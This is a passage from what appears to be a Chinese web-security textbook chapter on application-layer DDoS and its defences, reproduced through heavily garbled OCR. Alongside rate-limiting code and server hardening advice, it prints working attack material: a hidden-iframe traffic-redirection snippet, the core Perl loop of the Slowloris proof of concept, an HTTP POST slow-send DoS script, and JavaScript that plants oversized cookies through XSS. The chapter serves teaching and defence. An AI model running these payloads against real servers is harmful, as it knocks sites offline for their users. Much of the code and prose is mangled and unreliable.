繁 调 用 ， 因 查询 无 法 立即 完成 ， 资 源 无 法 立即 释放 ， 会 导致 数据 库 请 
求 连接 过 多 ， 数 据 库 阻塞 ， 网 站 无 法 正常 打开 。 

在 互联 网 中 充斥 着 各 种 搜索 引擎、 信息 收集 等 系统 的 聆 虫 (spider) , 
碟 虫 把 小 网 站 直接 疏 死 的 情况 时 有 发 生 ， 这 与 应 用 层 DDOS 攻 击 的 结 末 
很 像 。 由 此 看 来 ， 应 用 层 DDOS 攻 击 与 正常 业务 的 界线 比较 模糊 。 
应 用 层 DDOS 攻 击 还 可 以 通过 以 下 方式 完成 : 在 黑客 入 侵 了 一 个 流量 很 
大 的 网 站 后 ， 通 过 复 改 页 面 ， 将 巨大 的 用 户 流量 分 流 到 目标 网 站 。 
比如 ， 在 大 流量 网 站 siteA 上 插入 一 段 代码 : 


«iframe src="http://target" height=0 width=0 
></iframe> 


那么 所 有 访问 该 页 面 的 siteA 用 户 ， 都 将 对 此 target 发 起 一 次 HTTP GET 
请 求 ， 这 可 能 直接 导致 target 拒 绝 服务 。 

应 用 层 DDOS 攻 击 是 针对 服务 右 性 能 的 一 种 攻击 ， 那 么 许多 优化 服务 器 
性 能 的 方法 ， 都 或 多 或 少 地 能 缓解 此 种 攻击 。 比 如 将 使 用 频率 高 的 数 


据 放 在 memcache 中 ， 相 对 于 查询 数据 库 所 消耗 的 资源 来 襄 ， 查 询 
memcache 所 消耗 的 资源 可 以 忽略 不 计 。 但 很 多 性 能 优化 的 方案 并 非 是 
为 了 对 抗 应 用 层 DDOS 攻 击 而 设计 的 ， 因 此 攻击 者 想 要 找到 一 个 资源 消 


[页 
耗 大 的 页 面 并 不 困难 。 比 如 当 memcache 查 询 没 有 命中 时 ， 服 务 器 必然 


会 查询 数据 库 ， 从 而 增 大 服务 器 资源 的 消耗 ， 攻 击 者 只 需要 找到 这 样 


的 页 面 即 可 。 同 时 攻击 者 除了 触发 “读数 据 操 作 外 ， 还 可 以 触发 “ 写 ” 数 
据 操 作 ,“ 写 ”数据 的 行为 一 般 都 会 导致 服务 器 操作 数据 库 。 
13.2.2 ”限制 请 求 频率 
最 遇见 的 针对 应 用 层 DDOS 攻 击 的 防御 措施 ， 是 在 应 用 中 针对 每 个 “ 客 
户 端 ” 做 一 个 请 求 频率 的 限制 。 比 如 下 面 这 段 代 码 : 

ee ect 

# 1f mencache Lice does not exist, then, 
MESE (bikip == None): ] 
pup e 
—— meer 
datetime.datetime.now(); RM 


status': 'ok'},] 
stLimitList', blkip) 


memcache .add( 'Reque 


ip_exists = False 
for ips in blkip: 
# found ip 


if (ips['ip_addr' 
ip_exists = Tru 


# check if 


] == ip_addr): 
e 


bcookie is the same 


if (not bcookie) or 


(ips.has key('bcookie 
ips['coun 
ips['upda 


datetime.datetime.now() 


# if upda 


') and ips['bcookie'] 


E], cpm di 
te time'] - 


te time is 30 seconds 


later, then reset base time 
period - ips['update time'] - 


ips['base time'] 
if ( period.seconds » 30 ) and 
( ips['status'] -- 'ok' ): 
ips['base time'] - 
ips['update time'] 
ips['count'] = 1 
rea 
lse: # ip is the same, but 
bcookie is different 
pass 
# ip not found 
if (ip exists -- False): 
blkip.append({'ip_addr': ip addr, 
'bcookie': bcookie, 
'count': 1, 
'base time': 
time.datetime.now(), 
'update time': 
time.datetime.now(), 


date 
date 


s 3) 
memcache.set('RequestLimitList', 
blkip) 
return 

def checkIPInBlacklist(self, ip_addr 
bcookie): 
blkip = memcache.get('RequestLimitList') 
# flag to check if found a block ip 
found - False 
## step 1: find the ip address in ip list 
## step 2: check if request counts reach 
imits 
## step 3: check if time period is in 
imi 
for ips in blkip: 
if (ips['ip addr'] == ip addr): # find 
the ip 


# check if the ip is bannd 
reqs time - datetime.datetime.now() 
- ips['base time'] 
if ( ips['status'] -- 'banned' ): 
# if banned time is over, then 
free the ip 
if (reqs_time.seconds >= 
PLANETCONFIG['REQUESTLIMITFREETIME']) : # 
time to free 
the banned ip 
# reset the ip log 
ips['count'] = 1 
ips['base_time'] = 
datetime. datetime.now() 
ips['update time'] = 
datetime.datetime.now() 
ips['status'] = 'ok' 
memcache.set('RequestLimitList', 
blkip) 


se: 

found - True 

break 
f (ips['count'] »- 
PLANETCONFIG['REQUESTLIMITPERHALFMIN']): # 
check count limit 
sprint reqs time.seconds 
if ( reqs_time.seconds < 30): # 

check time limit 

found - True 

# reset the ip log 

ips['count'] = 1 

ips['base time'] - 
datetime.datetime.now() 

ips['update time'] - 
datetime.datetime.now() 

ips['status'] = 'banned' 

memcache.set('RequestLimitList', 
blkip) 

break 

return found 


在 使 用 时 : 


# request limit 
reqlimit = RequestLimit( 
# remember checkIPInBlacklist must invoke 
after addRequestClick 
reglimit.addRequestClick(ip, bcookie) 
if (reglimit.checkIPInBlacklist(ip, bcookie) 
-- True): 

self.response.set status(444, 'request too 
busy') 

self.renderTemplate( 'common/ 
requestlimit.html') 

return False 


这 段 代 码 束 是 针对 应 用 层 DDOS 攻 击 的 一 个 简单 防御 。 它 的 思路 很 徐 

单 ， 通 过 IP 地 址 与 Cookie 定位 一 个 客户 端 ， 如 果 客 户 端 的 请 求 在 一 定 
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从 架构 上 看 ， 这 段 代 码 需要 放 在 业务 逻辑 之 前 ， 才 能 起 到 保护 后 端 应 

用 的 目的 ， 可 以 看 做 是 一 个 “基层 ”的 安全 模块 。 

13.2.[3 ” 道 高 一 尺 ， 魔 高 一 丈 

然而 这 种 防御 方法 并 不 完美 ， 因 为 它 在 客户 端的 判断 依据 上 并 不 是 永 

远 可 靠 的 。 这 个 方案 中 有 两 个 因素 用 以 定位 一 个 客户 端 : 一 个 是 IP 地 

址 ， 男 一 个 是 Cookie。 但 用 户 的 IP 地 址 可 能 会 发 生 改 变 ， 而 Cookie 义 可 

能 会 被 清 衬 ， 如 果 了 P 地 址 和 Cookie 同 时 都 发 生 了 变化 ， 那 么 吏 无 法 再 定 

位 到 同一 个 客户 端 了 。 

如 何 让 IP 地 址 发 生变 化 呢 ? 使 用 “代理 服务 器 ?是 一 个 常见 的 做 法 。 在 实 

际 的 攻击 中 ， 大 量 使 用 代理 服务 器 或 便血 机 来 隐藏 攻击 者 的 真实 IP 地 


址 ， 已 经 成 为 一 种 成 熟 的 攻击 模式 。 攻 击 者 使 用 这 些 方法 可 不 断 地 变 
换 IP 地 址 ， 就 可 以 绕 过 服务 器 对 单个 IP 地 址 请 求 频率 的 限制 了 。 

代理 猎手 是 一 个 常用 的 搜索 代理 服务 器 的 工具 。 
SE -ox 
系统 @) PISO “搜索 结果 @) (ONES) WHTAG SOW WHW 


BRES BRR | 代理 调度 | 


搜索 结果 [ 共 32 个 ，1 个 被 选中 ] 
,服务 器 地 址 | 端口 | 类 型 | 时 间 特 性 | 调度 al 
202. 60. 252. 27 == HTTP 0.1| 0.6] 0 
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代理 猪手 使 用 界面 

而 AccessDiver 则 已 经 目 动 化 地 实现 了 这 种 变换 耳 地 址 的 攻击 ， 它 可 以 

d CHEM ， 然 后 通过 代理 服务 器 在 线 暴力 破解 用 户 名 
[密码 。 


9 AccessDiver v4.170 Bie <x) 
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Found logins usable proxies: 22/317 
Weak logins: 0 


Speed: 87428 hour 


Time spent: 00:00:07 
Time left; 00:23:29 


Attempts: 286 
Attempt lett: 34226 


AccessDiver 使 用 界面 
攻击 者 使 用 的 这 些 混 消 信息 的 手段 ， 都 给 对 抗 应 用 层 DDOS 攻 击 市 来 了 
很 大 的 困难 。 那 么 到 底 如 何 解决 这 个 问题 呢 ? 应 用 层 DDOS 攻 击 并 非 一 
个 无 法 解决 的 难题 ， 一 般 来 说 ， 我 们 可 以 从 以 下 几 个 方面 着 手 。 

首先 ， 应 用 代码 要 做 好 性 能 优化 。 合 理 地 使 用 memcache 就 是 一 个 很 好 
的 优化 方案 ， 将 数据 库 的 压力 尽 可 能 转移 到 内 存 中 。 此 外 还 需要 及 时 
地 释放 资源 ， 比 如 及 时 关闭 数据 库 连 接 ， 减 少 空 连接 等 消耗 。 

其 次 ， 在 网 络 架 构 上 做 好 优化 。 疼 于 利用 负载 均衡 分 流 ， 避 人 免 用 户 流 
量 集中 在 单 台 服务 左上。 同 时 可 以 充分 利用 好 CDN 和 镜像 站 点 的 分 流 
作用 ， 绥 解 主 站 的 压力 。 


最 后 ， 也 是 最 重要 的 一 点 ， 实 现 一 些 对 抗 手 段 ， 比 如 限制 每 个 下地 址 
的 请 求 频率 。 
下 面 我 们 将 更 深入 地 探讨 还 有 哪些 方法 可 以 对 抗 应 用 层 DDOS 攻 击 。 


13.3 ”验证 码 的 那些 事 儿 

难 证 码 是 互联 网 中 常用 的 技术 之 一 ， 它 的 英文 和 侧 称 是 CAPTCHA 
( Completely Automated Pub-lic Turing Test to Tell Computers and 
HumansApart， 全 自动 区 分 计算 机 和 人 类 的 图 灵 测 试 ) 。 在 很 多 时 
候 ， 如 有 果 可 以 忽略 对 用 户 体 验 的 有 影响， 那么 引入 验证 码 这 一 手段 能 够 
有 效 地 阻止 目 动 化 的 重 放行 为 。 

如 下 是 一 个 用 户 提 交 评 论 的 页 面 ， 肉 入 答 证 码 能 够 有 效 防止 资源 泪 
用 ， 因 为 通 第 脚本 无 法 目 动 识 别 出 验 证 码 。 

em [ — ——]] 
00999996 


) 


VT 
um 
Add My Comment | [7 Remember Me | Forget Me 


Fi P'YEIEBI SES LAGOS ES 
但 验证 码 也 分 三 六 九 等 ， 有 的 答 证 码 容 易 识别 ， 有 的 则 较 难 识别 。 
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>: LN 


wA Ne 


各 种 各 样 的 验证 码 


CAPTCHA IWR, 2A SRA A SLAs o BREM Rit 
过 于 复杂 ， 那 么 人 也 很 难 辨 识 出 来 ， 所 以 验证 码 是 一 把 双 丸 证。 

有 验证 码 ， 就 会 有 验证 码 破 解 技 术 。 除 了 直接 利用 图 像 相 关 算 法 识别 
验证 码 外 ， 还 可 以 利用 Web 实 现 上 可 能 存在 的 漏洞 破解 验证 码 。 

因为 验证 码 的 验证 过 程 ， 是 比 对 用 户 提交 的 明文 和 服务 右 端 Session 里 
保存 的 验证 码 明 文 是 否 一 致 。 所 以 曾经 有 验证 码 系统 出 现 过 这 样 的 漏 
iH: 因为 验证 人 码 消 耗 掉 后 SessionID 未 更 新 ， 导 致使 用 原 有 的 SessionID 
到 二 直 重 复 提交 同一 个 验证 码 。 


POST /vul /1.0 
Cookie: PHPSESSID: 329847239847238947; 
joe h Mur 


Co 
co ction elo 

obeema izba b@fish.com&captcha=the_plai 
te xi 


———— 
问题 。 
JE GR BT DR GIGA 


if fo uon a d and captcha he red!= 
captcha sen captcha_stored the 
pre cess form); 


如 果 要 修补 也 很 简单 : 


if fo uom FEER d and captcha. a red!="" and 
sant chas: nt= ers cha stored the 
to red- 


还 有 的 验证 码 实现 方式 ， 是 提前 将 所 有 的 验证 码 图 片 生 成 好 ， 以 蛤 希 
过 的 字符 串 作 为 验证 码 图 片 的 文件 名 。 在 使 用 验证 码 时 ， 则 直接 从 图 
RI ape 0 TUUS 
BE 。 
但 这 种 一 一 对 应 的 验证 人 码 文 件 名 会 存在 一 个 缺陷 : 攻击 者 可 以 事先 采 
用 枚 举 的 方式 ， 裔 历 所 有 的 验证 码 图片 ， 并 建立 验证 码 到 明文 之 间 的 
一 一 对 应 天 系 ， 从 而 形成 一 张 “彩虹 表 ”*”， 这 也 会 导致 验证 码 形 同 虚 
d 满足 “不 可 预测 性 ? 原 
Jil 
D x 直接 通过 算法 破解 验证 码 的 方法 也 变 得 越 来 越 成 
。 通 过 一 些 图 像 处 理 技术 ， 可 以 将 验证 码 逐 步 变 化 成 可 识别 的 图 
i ?验证 码 的 机 器 识别 过 程 
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f \ 
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对 此 有 兴趣 的 朋友 ， 可 以 查阅 moonblue333 所 写 的 “如 何 识别 高 级 的 验 
证 人 码 ”。 


13.4 ”防御 应 用 层 DDOS 
验证 码 不 是 万 能 的 ， 很 多 时 候 为 了 给 用 户 一 个 最 好 的 体验 而 不 能 使 用 
验证 码 °。 且 验证 码 不 宜 使 用 过 于 频繁 ， 所 以 我 们 还 需要 有 更 好 的 方 


验证 码 的 核心 思想 是 识别 人 与 机 絮 ， 那 么 顺 着 这 个 思路 ， 在 人 机 识别 
方面 ， 我 们 是 否 还 能 再 做 一 些 事情 呢 ? 管 案 是 肯定 的 。 

在 一 般 情 况 下 ， 服 务 需 端 应 用 可 以 通过 判断 HTTP 头 中 的 User-Agent 字 
段 来 识别 客户 端 。 但 从 安全 性 来 看 这 种 方法 并 不 可 靠 ， 因 为 HTTP 头 中 
的 User-Agent 是 可 以 被 客户 剖 自 改 的 ， 所 以 不 能 信任 。 

一 种 比较 可 靠 的 方法 是 让 客户 端 解析 一 段 JavaScript， 并 给 出 正确 的 运 
行 结 果 。 因 为 大 部 分 的 自动 化 脚本 都 是 直接 构造 HTTP 包 完成 的 ， 并 非 
在 一 个 浏览 器 环境 中 发 起 的 请 求 。 因 此 一 段 需要 计算 的 JavaScript， 可 
以 判断 出 客户 端 到 故 是 不 是 浏 贤 器 。 类 似 的， 发送 一 个 flash 让 客户 端 
解析 ， 也 可 以 起 到 同样 的 作用 。 但 需要 注意 的 是 ， 这 种 方法 并 不 是 万 
有 的 目 动 化 脚本 是 内 藤 在 浏览 右 中 的 “内 挂 >， 束 无 法 检测 出 来 


除了 人 机 识别 外 ， 还 可 以 在 Web Server 这 一 层 做 些 防御 ， 其 好 处 是 请 
求 尚 未 到 达 后 端的 应 用 程序 里 ， 因 此 可 以 起 到 一 个 保护 的 作用 。 

在 Apache 的 配置 文件 中 ， 有 一 些 参数 可 以 缓解 DDOS 攻 击 。 比 如 调 小 
Timeout 、KeepAlive-Timeout 值 ， 增 加 MaxClients 值 。 但 需要 注意 的 
是 ， 这 些 参数 的 调整 可 能 会 影响 到 正常 应 用 ， 因 此 需要 视 实际 情况 而 
定 。 在 Apache 的 官方 文档 中 对 此 给 出 了 一 些 指导 一 一 

Apache 提 供 的 模块 接口 为 我 们 扩展 Apache、 设 计 防 御 措 施 提 供 了 可 
能 。 目 前 已 经 有 一 些 开 源 的 Module 全 部 或 部 分 实现 了 针对 应 用 层 
DDOS 攻 击 的 保护 。“mod_qos” 是 Apache 的 一 个 Module， 它 可 以 帮助 组 
解 应 用 层 DDOS 攻 击 。 比 如 mod_qos 的 下 面 这 些 配 置 就 非常 有 价值 。 


imum request rate (bytes/sec at request 


reading): 
QS SrvRequestRate 


# allows keep-alive support till the server 
reaches 600 connec tions: 

QS SrvMaxConnClose 

600 


mod_qos 功 能 强大 ， 它 还 有 更 多 的 配置 ， 有 兴趣 的 朋友 可 以 通过 官方 
网 站 获得 更 多 的 信息 。 

除了 mod_gos 外 ， 还 有 专用 于 对 抗 应 用 层 DDOS 的 mod_evasive 也 有 类 
似 的 效果 。 

mod_qos 从 思路 上 仍然 古 限制 单个 IP 地 址 的 访问 频率 ， 因 此 在 面 对 单 
个 下 地 址 或 者 耳 地 址 较 少 的 情况 下 ， 比 较 有 用 。 但 是 前 文 曾 经 提 到 ， 
如 果 攻 击 者 使 用 了 代理 服务 妖 、 倪 偶 机 进行 攻击 ， 该 如 何 有 歼 地 保护 
网 站 呢 ? 

Yahoo 为 我 们 提供 了 一 个 解决 思路 。 因 为 发 起 应 用 层 DDOS 攻 击 的 IP 地 
址 都 是 真实 的 ， 所 以 在 实际 情况 中 ， 攻 击 者 的 IP 地 址 其 实 也 不 可 能 
限制 增长 。 假 设 攻击 者 有 1000 个 耳 地 址 发 起 攻击 ， 如 果 请 求 了 10000 
次 ， 则 平均 每 个 下地 址 请 求 同 一 页 面 达 到 10 次 ， 攻 击 如 果 持 续 下 去 ， 
单个 下地 址 的 请 求 也 将 变 多 ， 但 无 论 如 何 变 ， 都 是 在 这 1000 个 下地 址 
的 范围 内 做 轮 询 。 

为 此 Yahoo 实 现 了 一 套 算法 ， 根 据 IP 地 址 和 Cookie 等 信息 ， 可 以 计算 客 
户 端 的 请 求 频率 并 进行 拦截 。Yahoo 设 计 的 这 套 系 统 也 是 为 Web Server 
开发 的 一 个 模块 ， 但 在 整体 架构 上 会 有 一 台 master 服 务 絮 集中 计算 所 
有 IP 地 址 的 请 求 频率 ， 并 同步 策略 到 每 台 WebServer 上。 
Yahoo 为 此 申请 了 一 个 专利 (Detecting sys-tem abuse) ， 因 此 我 们 可 以 
查阅 此 专利 的 公开 信息 ， 以 了 解 更 多 的 详细 信息 。 


United States Patent 7,533,414 


Reed , et al. May 12, 2009 
Detecting system abuse 
Abstract 


A system continually monitors service 
requests and detects service abuses. First, a 
Screening list is created to identify 
potential abuse events. A screening list 
includes 

event IDs and associated count values. A 
pointer cyclically selects entries in the 
table, 

advancing as events are received. An 
incoming event ID is compared with the event 
IDs in 

the table. If the incoming event ID matches 
an event ID in the screening list, the 
associated 

count is incremented. Otherwise, the count 
of a selected table entry is decremented. If 
the count value of the selected entry falls 
to zero, it is replaced with the incoming 
event. 

Event IDs can be based on properties of 
service users, such as user identifications, 
or 

of service request contents, such as a 
search term or message content. The 
screening list 

is analyzed to determine whether actual 
abuse is occurring. 


Yahoo k iL Hix E DH PRA, AIRRA, "UI AA BO be H IZ 
DDOS 攻 击 和 一 些 类 似 的 资源 滥用 攻击 。 但 Yahoo 并 未 将 其 开源 ， 因 此 
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实现 一 套 类 似 的 系统 。 


13.5 “资源 耗 尽 攻击 

除了 CC 攻击 外 ， 攻 击 痢 还 可 能 利用 一 些 WebServer 的 漏洞 或 设计 缺陷 ， 
直接 造成 拒绝 服务 。 下 面 看 几 个 典型 的 例子 ， 并 由 此 分 析 此 类 (分 布 
式 ) 拒绝 服务 攻击 的 本 质 。 

13.5.1 Slowloris 攻 击 


Slowloris 是 在 2009 年 由 著名 的 Web 安 全 专家 RSnake 提 出 的 一 种 攻击 方 
法 ， 其 原理 是 以 极 低 的 速度 往 服务 器 发 送 HTTP 请 求 。 由 于 WebServer 
对 于 并 发 的 连接 数 都 有 一 定 的 上 限 ， 因 此 若是 恶意 地 占用 住 这 些 连接 
不 释放 ， 那 么 Web Server 的 所 有 连接 都 将 被 恶意 连接 占用 ， 从 而 无 法 接 
SPI, FROUEZ ° 

要 保持 住 这 个 连接 ，RSnake 构 造 了 一 个 畸形 的 HTTP 请 求 ， 准 确 地 说 ， 
是 一 个 不 完整 的 HITP 请 求 。 


GET / HTTP/1.1\r\n 

Host: host\r\n 

User-Agent: Mozilla/4.0 (compatible; MSIE 
7.0; Windows NT 5.1; Trident/4.0; .NET CLR 
1.1.4322; .NET CLR 2.0.50313; .NET CLR 
3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 
12)\r\n 

Content-Length: 42\r\n 


在 正常 的 HTTP 包 头 中 ， 是 以 两 个 CLRF 表 示 HTTP Headers 部 分 结束 
的 。 


Content-Length: 42\r\n\r\n 


由 于 Web Server 只 收 到 了 一 个 \\n， 因 此 将 认为 HITP Headers 部 分 没有 
结束 ， 并 保持 此 连接 不 释放 ， 继 续 等 竺 完整 的 请 求 。 此 时 客户 端 再 发 
送 任意 HITP 头 ， 保 持 住 连接 即 可 。 


X-a: b\r\n 


当 构造 多 个 连接 后 ， 服 务 夯 的 连接 数 很 快 束 会 达到 上 限 。 在 Slowloris 的 
专题 网 站 上 可 以 下 载 到 POC 演 示 程 序 ， 其 核心 代码 如 下 : 


sub doconnections { 
my ( $num, $usemultithreading ) = Q ; 
my ( Qfirst, @sock, Qworking ); 
my $failedconnections = 0; 


num ); ng 
$first[$_] = 0 foreach ( 1 .. 
$nu 


m ); #initializing 
while (1) { 
$failedconnections = 0; 
print "\t\tBuilding sockets.\n"; 
foreach my $z ( 1 .. $num ) { 
if ( $working[$z] == © ) { 
i sl) { 


( 
$sock[$z] = new 
IO: :Socket: :SSL( 
PeerAddr => 


"$host", 

sateen iene => 
FOREN Timeout => 
Teei; Proto 


$working[$z] = 1; 
} 
else { 
$working[$z] = 0; 
a 
3 
else { 
if 


$sock[$z] = new 
IO::Socket::INET( 
PeerAddr => 


"$host", 
PeerPort -» 
"Sport", 
Timeout => 
"$tcpto", 
Proto => 
"tep" 
/ 
) 
) 
$working[$z] = 1; 
$packetcount - 


$packetcount + 3; #SYN, SYN+ACK, ACK 


} 
else { 

$working[$z] = 0; 
} 


3 
if ( $working[$z] == 1 ) { 
if ($cache) { 
$rand = "2" 
int( rand(99999999999999) ); 


else { 
$rand - ""; 
} 


my $primarypayload = 
"$method /$rand 
HTTP/1.1\r\n" 
"Host: $sendhost\r\n" 
"User-Agent: 
Mozilla/4.0 (compatible; MSIE 7.0; Windows 
NT 5.1; Trident/4.0; 
.NET CLR 
1.1.4322; .NET CLR 2.0.50313; .NET CLR 
3.0.4506.2152; 
.NET CLR 3.5.30729; 
MSOffice 12)\r\n" 
"Content-Length: 42Nr 


Mn"; 
my $handle = $sock[$z]; 
if ($handle) { 
print $handle 
"$primarypayload"; 
if 
( $SIG(. WARN 3 ) { 
$working[$z] = 0; 
close $handle; 
$failed++; 
$failedconnections++; 
else { 
$packetcount++; 
$working[$z] = 1; 
} 
} 
else { 
$working[$z] = 0; 
$failed++; 
$failedconnections++; 
} 
} 
else ( 
$working[$z] - 0; 
$failed++; 


$failedconnections++; 


} 


} 
print "\t\tSending data.\n"; 
foreach my $z ( 1 .. $num ) { 
if ( $working[$z] == 1) { 
if ( $sock[$z] ) { 
my $handle = $sock[$z]; 
if ( print $handle "X-a: 
brin" ) ( 
$working[$z] = 1; 
$packetcount++; 


} 

else { 
$working[$z] = 0; 
#debugging info 
$failed++; 


$failedconnections++; 


3 
else { 
$working[$z] = 0; 
ee info 
$failed 
Grad ledeomnestdonet t; 
} 
} 
doe 
print 
"Current stats:\tSlowloris has now 
sent $packetcount packets successfully. *nThis 
thread now sleeping for 
timeout seconds...\n\n"; 
sleep($timeout) ; 
3 
} 
sub domultithreading { 
my ($num) = Q ; 
my @thrs; 
$i = 0; 
my $connectionsperthread = 50; 
while ( $i < $num ) { 
thrs[$i] = threads->create( \&doconnections, 
udi onspertiread, EMO 
= $connectionsperthread; 
} 
my @threadslist = Sas >list(); 


while ( peg E >o)f{ 
failed = 
} 


} 


m Server 都 是 有 效 的 。 从 这 种 方式 可 以 看 


此 类 拒绝 服务 攻击 的 本 质 ， 实 际 上 是 对 有 限 资 源 的 无 限制 滥用 。 

在 Slowloris 案 例 中 , “有 限 ” 的 和 资源 是 webServer 的 连接 数 。 这 是 一 MA 
上 限 的 值 ， 比 如 在 Apache 中 这 个 值 由 MaxClients 定 义 。 REER 
可 以 无 限制 地 将 连接 数 占 满 ， 就 完成 了 对 有 限 资 源 的 恶意 消耗 ， 导致 
拒绝 服务 。 

在 Slowloris 发 布 之 前 ， 也 曾经 有 人 意识 到 这 个 问题 ， 但 是 Apache 官 方 
否认 Slowloris 的 攻击 方式 是 一 个 漏洞 ， 他 们 认为 这 起 Web Server 的 一 种 
特性 ， 通 过 调整 参数 能 够 缓解 此 类 问题 ， 给 出 的 回应 是 参考 文档 中 调 
整 配置 参数 的 部 分 。 

Web Server 的 消极 态度 使 得 这 种 攻击 今天 仍然 很 有 效 。 

13.5.2 HTTP POST DOS 

1E20104££ P JOWASP X Z E, Wong OnnChee 和 Tom Brennan 演 示 了 一 种 
类 似 于 Slowloris 效 果 的 攻击 方法 ， 作 者 称 之 为 HITPPOST D.O.S. ° 

其 原理 是 在 发 送 HTTP POST 包 时 ， 指 定 一 个 非常 A h Content-Length 
值 ， 然 后 以 很 低 的 速度 发 包 ， 比如 10 一 100s 发 一 个 字 节 ， 保 持 住 这 个 
连接 不 断 开 。 这 样 当 客户 端 连 接 数 多 了 以 后 ， 占 用 住 了 Web lear 
有 可 用 连接 ， 从 而 导致 DOS » POC 如 下 图 所 示 : 


3] WVS Scripting : 
:Quuuiisiw»--|l - |D-Workwve NWeblppScarlbin Data Scripts ampleslpost. dos. script 


var number of connections = 256; 
var sockets - new Array(): 


for (var i-0; i«number of connections; i++) 
{ 

var s = new TSocket ("tcp"); 

sockets[i] = s; 


s.host = "acuart"; 
s.port = 80; 
s.Timeout - 0; 


if(s.connect()) 
t 
Trace(i * " Connected") ; = 
Sent = s.Send( /aaaaaaaaaaaa H 
"Host: acuart\r\n" + 
"Connection: keep-alive\r\n" + 
"Keep-Alive: 900\r\n" + 
"Content-Length: 100000000\r\n" + 
"Content-Type: application/x-www-form-urlencoded\r\n" + 
"Accept: *.*\r\n" + 
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) App 
"acunetix"); 


if (Sent<=0) Trace("Error sending"); 
else Trace(i+ " Sent data"); 
} 


while (1){ 
for (var i=0; i<number_of connections; itt) 
{ 
sockets[i].Send("z"); 
} 
sleep (1000); 
trace("."); 


3 -) 
4 mm ———— i ——— É€— anÍ—— 
成 功 实 施 攻 击 后 会 留 下 如 下 错误 日 志 (Apache) 


$tail -f /var/log/apache2/error.log 

[Mon Nov 22 15:23:17 2010] [notice] 
Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 
with 

Suhosin-Patch mod ssl/2.2.9 OpenSSL/0.9.8g 
configured — resuming normal operations 
[Mon Nov 22 15:24:46 2010] [error] server 
reached MaxClients setting, consider 
raising 

the MaxClients setting 


由 此 可 知 ， 这 种 攻击 的 本 质 也 是 针对 Apache 的 MaxClients 限 制 的 。 


要 解决 此 类 问题 ， 可 以 使 用 Web 应 用 防火 墙 ,， 或 者 一 个 定制 的 Web 
Server 安 全 模块 。 

由 以 上 两 个 例子 我 们 很 目 然 地 联想 到 ， 凡 是 资源 有 “限制 * 的 地 方 ， 都 
E ee MERER, aE P TU RE RC 
tT AY AS EE A BSR PBR Bi, TAA ^ EEA FAE E SE BEUSCRD AS 
可 能 无 限制 地 增长 ， 因 此 如 果 未 对 不 可 信任 的 资源 使 用 者 进行 配额 的 
限制 ， 就 有 可 能 造成 拒绝 服务 。 内 存 泄漏 是 程序 员 经 常 需要 解决 的 一 
种 bug， 而 在 安全 领域 中 ， 内 存 泄 漏 则 被 认为 是 一 种 能 够 造成 拒绝 服务 
攻击 的 方式 。 

13.5.3 Server Limit DOS 

Cookie 也 能 造成 一 种 拒绝 服务 ， 笔 者 称 之 为 Server Limit DOS， 并 曾 在 
笔者 的 博客 文章 中 描述 过 这 种 攻击 。 

Web Server 对 HTTP 包 头 都 有 长 度 限 制 ， 以 Apache 举 例 ， 默 认 是 8192 字 
万 。 也 就 是 说 ，Apache 所 能 接受 的 最 大 HTTP 包 头 大 小 为 8192 字 节 (这 
里 指 的 是 Request Header， 如 果 是 Re-quest Body， 则 默认 的 大 小 限制 是 
2GB) 。 如 果 客 户 端 发 送 的 HTTP 包 头 超过 这 个 大 小 ， 服 务 器 就 会 返回 
一 个 4xx 错 误 ， 提 示 信 息 为 : 


Your browser sent request that this 
ld not understand. 

Size of a request header field exceeds 
er limit. 


假如 攻击 者 通过 XSS 攻 击 ， 恶 意 地 往 客 户 端 写 入 了 一 个 超 长 的 Cookie， 
则 该 客户 端 在 清空 Cookie 之 前 ， 将 无 法 再 访问 该 Cookie 所 在 域 的 任何 页 
面 。 这 是 因为 Cookie 也 是 放 在 HTTP 包 头 里 发 送 的 ， 而 Web Server 默 认 
会 认为 这 是 一 个 超 长 的 非 正 常 请 求 ， 从 而 导致 “客户 端 ? 的 拒绝 服务 。 


«scri pt language="javascript"> 

alert(document.cookie); 

var metastr = "AAAAAAAAAA"; // 10 A 

var str = ""; 

while (str.length < 4000){ 
str += metastr; 

} 

alert(str.length); 

document.cookie - "evil3- 

)\<\/seri 

08:37:43 

ie =" 


+ "\<script 
\>alert(xss +" expires=Thu 
18-Apr-2019 

document.cookie = "evili=" + str 
+";expires=Thu, 18-Apr-2019 08:37:43 GMT;"; 
document.cookie = "evil2-" + str 


pt\>" 
GMT; "; 
“qq 


+";expires=Thu, 18-Apr-2019 08:37:43 GMT;"; 
alert(document.cookie); 
«/script» 


E IRI P SF A — ER TK HJ Cookie 。 
要 解决 此 问题 ， 需 要 调整 Apache 配 置 参 数 LimitRequestFieldSize， 
参数 设置 为 0 时 ， 对 HTTP 包 头 的 大 小 没有 限制 。 


ae 


通过 以 上 几 种 攻击 的 介绍 ， 我 们 了 解 到 “拒绝 服务 攻击 ”的 本 质 实 际 上 
就 是 一 种 “资源 耗 尽 攻 击 ”， 因 此 在 设计 系统 时 ， 需 要 考虑 到 各 种 可 能 
出 现 的 场景 ， 避 人 免 出 现 “ 有 限 资源 ”被 恶意 滥用 的 情况 ， 这 对 安全 设计 
提出 了 更 高 的 要 求 。 


13.6 一 个 正则 引发 的 血案 : ReDOS 

正则 表达 式 也 能 造成 拒绝 服务 ? 是 的 ， 当 正则 表达 式 写 得 不 好 时 ， 就 
有 可 能 被 恶意 输入 利用 ， 消 耗 大 量 资源 ， 从 而 造成 DOS。 这 种 攻击 被 
称 为 Re-DOS。 

与 前 面 提 到 的 资源 耗 尽 攻击 略 有 不 同 的 是 ，ReDOS 是 一 种 代码 实现 上 
的 缺陷 。 我 们 知道 正则 表达 式 是 基于 NFA (Nondeterministic Finite Au- 
tomaton) 的 ， 它 是 一 个 状态 机 ， 每 个 状态 和 输入 符号 都 可 能 有 许多 不 
同 的 下 一 个 状态 。 正 则 解析 引 敬 将 遍历 所 有 可 能 的 路 径直 到 最 后 。 由 
于 每 个 状态 都 有 奉 干 个 “下 一 个 状态 ?>， 因 此 决策 算法 将 逐个 尝试 每 
个 “下 一 个 状态 ”>， 直 到 找到 一 个 匹配 的 。 

比如 这 个 正则 表达 式 : 

当 输 入 只 有 4 个 “a” 时 : 


aaaaX 


8 
它 只 有 16 条 可 能 的 路 径 ， 引 擎 很 快 能 遍历 完 。 
但 是 当 输 入 以 下 字符 串 时 : 


ee 此 后 每 增加 一 个 “a”， 路 径 的 数量 都 会 翻 


